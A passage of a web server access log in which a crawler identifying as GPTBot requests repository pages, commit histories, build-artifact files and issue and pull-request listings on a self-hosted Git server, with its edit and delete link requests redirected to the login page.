+0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11143] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11142] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11142] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 9823] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 9824] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:18:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9825] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:18:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9825] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:18:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9825] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:18:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:18:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:18:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:18:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:18:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:18:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:18:38:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:18:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:18:38:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:18:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:18:38:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:18:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:18:38:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:18:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:18:38:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:18:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:18:38:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:18:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:18:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 11154] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:18:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=all&type=all" -[17/Feb/2026:18:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&sort=latest&state=all&type=all" 